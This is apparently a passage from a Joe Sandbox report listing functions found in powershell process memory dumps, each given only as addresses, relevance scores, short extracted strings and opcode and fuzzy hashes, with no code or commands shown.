                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_77c0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4']q$4']q$$]q$$]q$$]q
                                                                      • API String ID: 0-2353078639
                                                                      • Opcode ID: fa2a4a8dfe8a070074bdab7bf9b5e8fb8c14c4e2457e72565b7c05d534b02a69
                                                                      • Instruction ID: 9730b8f3c551abec9651fce61cd0cc0766bf38ec896392f00188a1fdf6d2c41f
                                                                      • Opcode Fuzzy Hash: fa2a4a8dfe8a070074bdab7bf9b5e8fb8c14c4e2457e72565b7c05d534b02a69
                                                                      • Instruction Fuzzy Hash: 5F7101B1B00216CFCB24DBB999102AEBBE6EF89350F14887EC849DB251DA31C955C7E1
                                                                      Function 077C3E8A Relevance: 4.4, Strings: 3, Instructions: 644COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2594746569.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_77c0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4']q$x.wk$-wk
                                                                      • API String ID: 0-287318233
                                                                      • Opcode ID: 2a7a0d6963bce59feec2a51b80a1b9172f7a52cae2cfb961924acff547f298c9
                                                                      • Instruction ID: 1191079773ec32ec2f785d9423753c86ff945558a28be46d3e001bdaeb77338d
                                                                      • Opcode Fuzzy Hash: 2a7a0d6963bce59feec2a51b80a1b9172f7a52cae2cfb961924acff547f298c9
                                                                      • Instruction Fuzzy Hash: 2F528FB4B002149FDB24DB18C951F6ABBB2EB89304F11C899E9099F751CB72ED85CF91
                                                                      Function 077CD13B Relevance: 4.4, Strings: 3, Instructions: 621COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2594746569.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_77c0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4']q$x.wk$-wk
                                                                      • API String ID: 0-287318233
                                                                      • Opcode ID: 48372e90fe4811f3646a6712839bd2997d85ecb426c50650812920f0a5312e84
                                                                      • Instruction ID: abb6411fa6b74ff52b8e9e6eefb2130e2aec87d8e15df551fd4021baa7a573d0
                                                                      • Opcode Fuzzy Hash: 48372e90fe4811f3646a6712839bd2997d85ecb426c50650812920f0a5312e84
                                                                      • Instruction Fuzzy Hash: 184264B4B002149FD724DB58C991FAAB7B2EF89304F5184A8E9095F751CB72ED82CF91
                                                                      Function 077C3F9B Relevance: 4.2, Strings: 3, Instructions: 489COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2594746569.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_77c0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4']q$x.wk$-wk
                                                                      • API String ID: 0-287318233
                                                                      • Opcode ID: 566e70c4847e594dab3082f3af66bb9936b44485f94955f3bfe0ef3acaec9d58
                                                                      • Instruction ID: 05726599b8f6253ba1889688fdf3fbb3b2230002059bf198a6daab6972cd5d6e
                                                                      • Opcode Fuzzy Hash: 566e70c4847e594dab3082f3af66bb9936b44485f94955f3bfe0ef3acaec9d58
                                                                      • Instruction Fuzzy Hash: A02282B47002149FDB24DB18C951F6ABBB2EB89314F11C898E9095F751CB72ED85CF91
                                                                      Function 077CD221 Relevance: 4.2, Strings: 3, Instructions: 468COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2594746569.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_77c0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4']q$x.wk$-wk
                                                                      • API String ID: 0-287318233
                                                                      • Opcode ID: 196c10b0ae4da4ea3f90a5d5977bfde7d7942cd3a99e5f8a2b4602afa91814af
                                                                      • Instruction ID: a4c55d0820aa7953daa8497a49a55d58e3f046dd9d6c5ab3f0ffd484bdef392f
                                                                      • Opcode Fuzzy Hash: 196c10b0ae4da4ea3f90a5d5977bfde7d7942cd3a99e5f8a2b4602afa91814af
                                                                      • Instruction Fuzzy Hash: E51274B4B002149FD724DB58CD91FAABBB2EB89304F518498E9095F791CB72ED42CF91
                                                                      Function 077C1020 Relevance: 3.8, Strings: 3, Instructions: 94COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2594746569.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_77c0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $]q$$]q$$]q
                                                                      • API String ID: 0-182748909
                                                                      • Opcode ID: fdb744d882d1a89f0991b28a0867f2c1406a35b622c05f60ddcf43ab925bf8e0
                                                                      • Instruction ID: 7598c6c0661f4e502faa7d252c14148381c2bf63f16acd019b1d02b8b79ee595
                                                                      • Opcode Fuzzy Hash: fdb744d882d1a89f0991b28a0867f2c1406a35b622c05f60ddcf43ab925bf8e0
                                                                      • Instruction Fuzzy Hash: A02157F131034A9BFB34D56A8950B36A6DAABC9751FB48C3ED949C7382CD36C8858361
                                                                      Function 077CD2C1 Relevance: 2.9, Strings: 2, Instructions: 424COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2594746569.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_77c0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4']q$x.wk
                                                                      • API String ID: 0-4129064336
                                                                      • Opcode ID: 54711fafdf266655363c790e212ef31dc095f33fe10932d11f7ed58dc0556dcf
                                                                      • Instruction ID: 7823e93b36087116b2a006f72286201d07d73fc7f41bf099ed65b56cfda6f9a5
                                                                      • Opcode Fuzzy Hash: 54711fafdf266655363c790e212ef31dc095f33fe10932d11f7ed58dc0556dcf
                                                                      • Instruction Fuzzy Hash: 24124AB4B00219DFDB64CB18C941BAAB7B2EB89344F1185ECD9096B751CB32ED85CF91
                                                                      Function 077CD2AB Relevance: 2.8, Strings: 2, Instructions: 331COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2594746569.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_77c0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4']q$x.wk
                                                                      • API String ID: 0-4129064336
                                                                      • Opcode ID: e2ff40650d56036e542ae194e4fec7a19ce5a86ea673e8e12900b3b3cc22a2b5
                                                                      • Instruction ID: 969d8832380bd3dcfab387919233e626aac454fe9aa5f850722ef56879be356b
                                                                      • Opcode Fuzzy Hash: e2ff40650d56036e542ae194e4fec7a19ce5a86ea673e8e12900b3b3cc22a2b5
                                                                      • Instruction Fuzzy Hash: 9DE15BB4B00219DFDB64CB18CA41BAAB7B2EB89344F1185ECD9096B741CB32ED85CF51
                                                                      Function 077C0B48 Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2594746569.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_77c0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: tP]q$tP]q
                                                                      • API String ID: 0-145478062
                                                                      • Opcode ID: 5706049d6ac20b071a4c437b7bd391753fbc04c33da85804e2888378869654f3
                                                                      • Instruction ID: f6eeed6eaee4c2572062d8e904ade2948ed4c2149f7e3cd5fa43e5390eaca187
                                                                      • Opcode Fuzzy Hash: 5706049d6ac20b071a4c437b7bd391753fbc04c33da85804e2888378869654f3
                                                                      • Instruction Fuzzy Hash: 025125B1704355DFCB35CAA98C407ABBBA6AF8A351F14C86FD945CB291CA35C844C7E1
                                                                      Function 077C100F Relevance: 2.6, Strings: 2, Instructions: 73COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2594746569.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_77c0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $]q$$]q
                                                                      • API String ID: 0-127220927
                                                                      • Opcode ID: 5b9162492adcc5b1eeaaf4d5fe950a6260dfee4e073d76b577450f1b51b12886
                                                                      • Instruction ID: 125409f697f1fc1a89bab591e095cf51014690004e99ca66104570201e5a4cbc
                                                                      • Opcode Fuzzy Hash: 5b9162492adcc5b1eeaaf4d5fe950a6260dfee4e073d76b577450f1b51b12886
                                                                      • Instruction Fuzzy Hash: 86112CF131438A5AFB3485264D507766BA59BC6751F648C7FD944D7283C665C8848331
                                                                      Function 077C46D8 Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2594746569.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_77c0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: x.wk
                                                                      • API String ID: 0-117599076
                                                                      • Opcode ID: 913f8726d20c52602eeedf27a46be600d76cec84622662797a563f280881d581
                                                                      • Instruction ID: 3b2043bc3fe445176ca2e3c6c8f00d8c921f784d5524cb3fe27c6d7135bcde67
                                                                      • Opcode Fuzzy Hash: 913f8726d20c52602eeedf27a46be600d76cec84622662797a563f280881d581
                                                                      • Instruction Fuzzy Hash: EE31F874740104AFD724E764CAA5BAE7AA3DFC4750F108828E9016F795CF76AC05CBE1
                                                                      Function 077C5D87 Relevance: 1.4, Strings: 1, Instructions: 101COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2594746569.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_77c0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $]q
                                                                      • API String ID: 0-1007455737
                                                                      • Opcode ID: 9ec30030c94d3957ebd9994f4c4ea4222bd89eb83de16d9146eaec29fc439e8c
                                                                      • Instruction ID: e45844c06abd5e9b9b263587ef7a928f84f674998545087d865551d32fd01d50
                                                                      • Opcode Fuzzy Hash: 9ec30030c94d3957ebd9994f4c4ea4222bd89eb83de16d9146eaec29fc439e8c
                                                                      • Instruction Fuzzy Hash: 2E315EF63101118BCB24962865116BFB7968BC9390F544C3FD906CB790DF73E966C3A0
                                                                      Function 0484EAB0 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2588372708.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4840000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4']q
                                                                      • API String ID: 0-1259897404
                                                                      • Opcode ID: f6d19640e4b818f965132e073f6481a82d339f0a95083a9d1a6776faf55b4d96
                                                                      • Instruction ID: a6a7819c8ddbc608f0598f6186e65a7b42d16fad5c9e033483bb995854fc4c59
                                                                      • Opcode Fuzzy Hash: f6d19640e4b818f965132e073f6481a82d339f0a95083a9d1a6776faf55b4d96
                                                                      • Instruction Fuzzy Hash: C90126313453802FE71D9738AC55B6E3BA7EFC6614F2508A9D0464F396C9A0AC498362
                                                                      Function 0484EAC0 Relevance: 1.3, Strings: 1, Instructions: 39COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2588372708.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4840000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4']q
                                                                      • API String ID: 0-1259897404
                                                                      • Opcode ID: 101007d30fac853b8c4c4ff9f570a3c8d67ea43aabf8bbee78d720b6300805f3
                                                                      • Instruction ID: c8fe5d6b11f0b7173b745034830ce936800823dc59c620e226d4b02fa92ee11c
                                                                      • Opcode Fuzzy Hash: 101007d30fac853b8c4c4ff9f570a3c8d67ea43aabf8bbee78d720b6300805f3
                                                                      • Instruction Fuzzy Hash: 76F096313403002BD61CA669AC55F6E769BEFC4A14F604D7CD50A5B395DDA1BC094395
                                                                      Function 048495A8 Relevance: .3, Instructions: 331COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2588372708.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4840000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4912e042aa44ebf5573eeda6205e281bfab2df0aeedab63b030c36138f1fa043
                                                                      • Instruction ID: 22a17c46f117b1c6fa5e792f3533ec537e83d1e2a2656c0c2aa997022c52d7bc
                                                                      • Opcode Fuzzy Hash: 4912e042aa44ebf5573eeda6205e281bfab2df0aeedab63b030c36138f1fa043
                                                                      • Instruction Fuzzy Hash: 2AE15C74A052489FCB15CFA8D484A9EFBB2FF89314F258599E805EB362C734ED45CB90
                                                                      Function 0484731A Relevance: .3, Instructions: 265COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2588372708.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4840000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ce0e749139fd81ae1b41cb915014caa323a9d112b99dcdfd6022999d585747d8
                                                                      • Instruction ID: 37e3fc0f34fb3470c4c5e7e9c4e3d3391c4cda2a85143236a94f5ddc08e5af63
                                                                      • Opcode Fuzzy Hash: ce0e749139fd81ae1b41cb915014caa323a9d112b99dcdfd6022999d585747d8
                                                                      • Instruction Fuzzy Hash: 69A15C35A00249DFDB14DFA8D544AADBBF2FFC4314F518A68E406AB364DB34AD49CB80
                                                                      Function 04847BD6 Relevance: .2, Instructions: 188COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2588372708.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4840000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2b5f81969b691d4fdebc32857372347e169e6e0089fe2383b92c3db3c784347b
                                                                      • Instruction ID: 9025cc2745dbe9315a57f4f86d8ad74d7fd455348f295e80fab72cb448083100
                                                                      • Opcode Fuzzy Hash: 2b5f81969b691d4fdebc32857372347e169e6e0089fe2383b92c3db3c784347b
                                                                      • Instruction Fuzzy Hash: 8E711A70A00248DFDB14DFA5D484BADBBF6FF88304F148929D416AB794DB35AD46CB81
                                                                      Function 077C5DAF Relevance: .2, Instructions: 181COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2594746569.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_77c0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b3e95784e30b409e6c74d505835a6a93fa640fae7a68b6a150d6fb583b9e8333
                                                                      • Instruction ID: 5a5d9e55d015020b561b8eead600649faed8b5d9fc51b82f1654b05820aa4853
                                                                      • Opcode Fuzzy Hash: b3e95784e30b409e6c74d505835a6a93fa640fae7a68b6a150d6fb583b9e8333
                                                                      • Instruction Fuzzy Hash: 14517BF16043059FC724CF68858177A7FE49F89390F2848AED884DB682DB32E994C7B1
                                                                      Function 04847A53 Relevance: .2, Instructions: 164COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2588372708.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4840000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4c3dc67de380974145da7e49d14651cd37ccf46d980c6e702bf072346f6a55ed
                                                                      • Instruction ID: e36a6da4eb81b531f54a94650eae4295ae587530ae6392475d5d1cafd62fdd18
                                                                      • Opcode Fuzzy Hash: 4c3dc67de380974145da7e49d14651cd37ccf46d980c6e702bf072346f6a55ed
                                                                      • Instruction Fuzzy Hash: 91617C30A00249CFDB14DFA8C484A9DBBF2FF88304F14896AD406AB765DB75BD46CB80
                                                                      Function 0484B6D0 Relevance: .2, Instructions: 153COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2588372708.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4840000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bada7a96e3e50deabc134aff3629a78592da1403dfc133095411aeda85a62660
                                                                      • Instruction ID: b413a45e71f983c7618c803fbe7bf2bf40143e672e9a1c1049d840d0c94c93a5
                                                                      • Opcode Fuzzy Hash: bada7a96e3e50deabc134aff3629a78592da1403dfc133095411aeda85a62660
                                                                      • Instruction Fuzzy Hash: 3A51E530A002488FDB09DFB9D5546AEBFF7EFC9210F188969C8059B3A6CB35AC05CB51
                                                                      Function 077C7D05 Relevance: .1, Instructions: 135COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2594746569.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_77c0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a9dd778ac50cd02bce8bf20d288ca4b7fab8a75a77da6ca8dea01dbdeaabd60c
                                                                      • Instruction ID: cda073e65061c0b5fce2a32efebec20527fe406a235e83e9464c93eae3afb1f3
                                                                      • Opcode Fuzzy Hash: a9dd778ac50cd02bce8bf20d288ca4b7fab8a75a77da6ca8dea01dbdeaabd60c
                                                                      • Instruction Fuzzy Hash: F54168B27001118BCB29D7B896516BABBE2DFC9354F108CAEC8018F745DE329D25CBE1
                                                                      Function 048477F9 Relevance: .1, Instructions: 122COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2588372708.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4840000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ba8e64462d5887e08d66b3288c94c04eb6755f731324fef35df3199227491e09
                                                                      • Instruction ID: c6a5a8b63dd2f7fbd27ec8d3a48f1c552cf0fa4ccda7c0190b461a2bf1e077ea
                                                                      • Opcode Fuzzy Hash: ba8e64462d5887e08d66b3288c94c04eb6755f731324fef35df3199227491e09
                                                                      • Instruction Fuzzy Hash: AE419D35A00248CFDB15DF74C854AAD7BF6EF89354F088569E406EB7A0DB38AD41CB90
                                                                      Function 0484F00C Relevance: .1, Instructions: 121COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2588372708.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4840000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e9a742731161b9c99f0f36b193307eb37c021e1e59484ec41ce573600715135a
                                                                      • Instruction ID: 2306d473c891a02b5c8e5b1c7d3bcf61f71c9d00cdf6bcaf137b8e41b83c5de7
                                                                      • Opcode Fuzzy Hash: e9a742731161b9c99f0f36b193307eb37c021e1e59484ec41ce573600715135a
                                                                      • Instruction Fuzzy Hash: F0513034A00209CFDB19DF68D444ADDBBB6FF88314F149668DA05AB3A5D774EC85CBA0
                                                                      Function 0484B700 Relevance: .1, Instructions: 119COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2588372708.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4840000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3cd79f2b108eaa563fd199a425ed065bab126d2ef46a4b4c7768511194a63c2d
                                                                      • Instruction ID: 111c3ecba140923a6adeaad6974673a577544c85e45037bbb762fdd1311b2e49
                                                                      • Opcode Fuzzy Hash: 3cd79f2b108eaa563fd199a425ed065bab126d2ef46a4b4c7768511194a63c2d
                                                                      • Instruction Fuzzy Hash: 0D4121306002089FDB08DFA9D5547AEBAF7EFC8314F14C869D805AB765DE35AC458B90
                                                                      Function 04847810 Relevance: .1, Instructions: 110COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2588372708.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4840000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f5ec7553d431eebe751fcbafc4ef2ced579756a1628d5d4cb03947d21edc72bb
                                                                      • Instruction ID: e31f916bce1c4dc0a007b19b0a27e85b8bfeb13ccce30b71809320cb139c457a
                                                                      • Opcode Fuzzy Hash: f5ec7553d431eebe751fcbafc4ef2ced579756a1628d5d4cb03947d21edc72bb
                                                                      • Instruction Fuzzy Hash: 6F415C35A00248CFDB14DF64C954AAD7BF6EF88754F148968E406EB7A0DB38AD41CB90
                                                                      Function 04842BB0 Relevance: .1, Instructions: 108COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2588372708.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4840000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 576544fb3591a7c0b379760f623b9c1ae9d340cd44fd1a3334b8e2baf7212677
                                                                      • Instruction ID: b1316c3e0c5da5b5ed245f08196758fd1165baf48d51c47f3d74a9eee5d859a6
                                                                      • Opcode Fuzzy Hash: 576544fb3591a7c0b379760f623b9c1ae9d340cd44fd1a3334b8e2baf7212677
                                                                      • Instruction Fuzzy Hash: 1B415D74A046098FCB09CF58C5D4AAAFBB1FF89354B158699D8059B365C732FC90CFA0
                                                                      Function 077C0EB0 Relevance: .1, Instructions: 94COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2594746569.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_77c0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ebd98607ef6f6b77ebf883bb2249cc4cb6307b48f25b90b6d2d5532f07083998
                                                                      • Instruction ID: 846b76f93440e6c4fda7b7043858390e6f3a30d1a89241ba0f367e5a2c0c08d3
                                                                      • Opcode Fuzzy Hash: ebd98607ef6f6b77ebf883bb2249cc4cb6307b48f25b90b6d2d5532f07083998
                                                                      • Instruction Fuzzy Hash: DB2128B130031AEBD724956A8D9473AB6DAABC9745F148C3EA545CB381CE75CC81C3E1
                                                                      Function 077C0E93 Relevance: .1, Instructions: 82COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2594746569.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_77c0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 917dd9c615fbe2c9c963e1379f5d5134d95a80da678a55a838f10c2fb84816d7
                                                                      • Instruction ID: f312240a72a68e78cb711e8a587b65642d2d311bae4c481dbc70825859b93368
                                                                      • Opcode Fuzzy Hash: 917dd9c615fbe2c9c963e1379f5d5134d95a80da678a55a838f10c2fb84816d7
                                                                      • Instruction Fuzzy Hash: F421ACB1304349BBD720966A4D907767F95DBCA741F18882EE944CB281CA799C84C3B1
                                                                      Function 04849597 Relevance: .1, Instructions: 61COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2588372708.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4840000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3bc31deea79a84c912352f02cee5d3cb95068ce051d95e5ab0570282322c7c16
                                                                      • Instruction ID: 8ef721624cefbb57d6b43b0548a6098f0900539519fd1cc1c8bb3857a3a56117
                                                                      • Opcode Fuzzy Hash: 3bc31deea79a84c912352f02cee5d3cb95068ce051d95e5ab0570282322c7c16
                                                                      • Instruction Fuzzy Hash: E7215BB4A052499FCB10CFACD5809AEBBF1FF89310B158599D849EB352C231ED41CBA1
                                                                      Function 0484FA03 Relevance: .1, Instructions: 58COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2588372708.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4840000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8d0bd662ec49784c2f8e9ecaf9fe8e18d85ec5ce92f0bfce9371a54756d1ee7a
                                                                      • Instruction ID: bc283229326ead1262b16bc51aea1f1a70b1df6613b80d4b420400b1fbd9d999
                                                                      • Opcode Fuzzy Hash: 8d0bd662ec49784c2f8e9ecaf9fe8e18d85ec5ce92f0bfce9371a54756d1ee7a
                                                                      • Instruction Fuzzy Hash: 7D112630A042499FD705DBA8E8057AEBFB1EF86319F1046A9D5499B392DB315C41CBD2
                                                                      Function 0479F283 Relevance: .1, Instructions: 57COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2588239853.000000000479D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0479D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_479d000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
                                                                      • Instruction ID: 01d88b6a925be75a9fb3e0af34d9f868857e3890b422227c6cd283b08cf5fda7
